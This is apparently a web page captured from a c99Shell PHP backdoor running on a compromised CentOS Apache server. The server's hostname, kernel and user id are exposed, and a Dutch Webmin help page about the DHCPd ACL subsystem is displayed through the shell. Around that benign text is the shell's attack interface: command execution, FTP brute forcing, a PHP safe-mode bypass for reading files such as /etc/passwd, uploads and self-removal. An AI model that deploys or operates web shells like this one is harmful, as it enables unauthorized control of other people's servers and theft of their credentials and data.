!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/dhcpd/help/   drwxr-xr-x
Free 50.88 GB of 127.8 GB (39.81%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     acl_info.nl.UTF-8.html (2.11 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
DHCPd ACL subsysteem

DOELSTELLING:

Het belangrijkste doel van het DHCPd ACL subsysteem is het bieden van een krachtig, flexibel en gemakkelijk uit te breiden besturingsmechanisme voor verscheidene objecten in de DHCPd configuratie. Deze objecten betreffen: gedeelde netwerken (shared networks), subnetten, groepen hosts en individuele hosts.

Daarnaast maakt het ACL subsysteem het mogelijk om andere voorzieningen aan te sturen zoals: unieke objectnamen en het aanbrengen van wijzigingen aan de configuratie, het bekijken en verwijderen van DHCP leases.

CONCEPTEN:

We kunnen ons de DHCP configuratie voorstellen als een boomstruktuur. Elk knooppunt in de boomstruktuur stelt een configuratie voor van een ander DHCP object (fig. 0).

Het ACL subsysteem ondersteunt twee toegangsniveaus:

  • globaal: lezen, schrijven en aanmaken;
  • per-object: lezen en schrijven.
Globale toegang bestaat voor elk type object (hosts, groepen, subnetten, gedeelde netwerken) en beheren operaties met een heel object van een gegeven type:
  • Globaal aanmaken
  • Globaal lezen
  • Globaal schrijven
Toegang per object biedt een meer flexibele manier om toegang te regelen. Een ACL voor toegang per object bestaat voor ieder individueel object. Op dit moment zijn ACL's per object alleen geïmplementeerd voor hosts en subnetten:
  • Per-object lezen
  • Per-object schrijven
Het ACL subsysteem kan werken met vier verschillende beveiligingsniveaus (of modes).

DHCPd configuratieboom, beveiligingsniveau 0, check subnetX toegang DHCPd configuratieboom, beveiligingsniveau 1, check subnetX toegang DHCPd configuratieboom, beveiligingsniveau 2, check subnetX toegang DHCPd configuratieboom, beveiligingsniveau 3, check subnetX toegang


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0111 ]--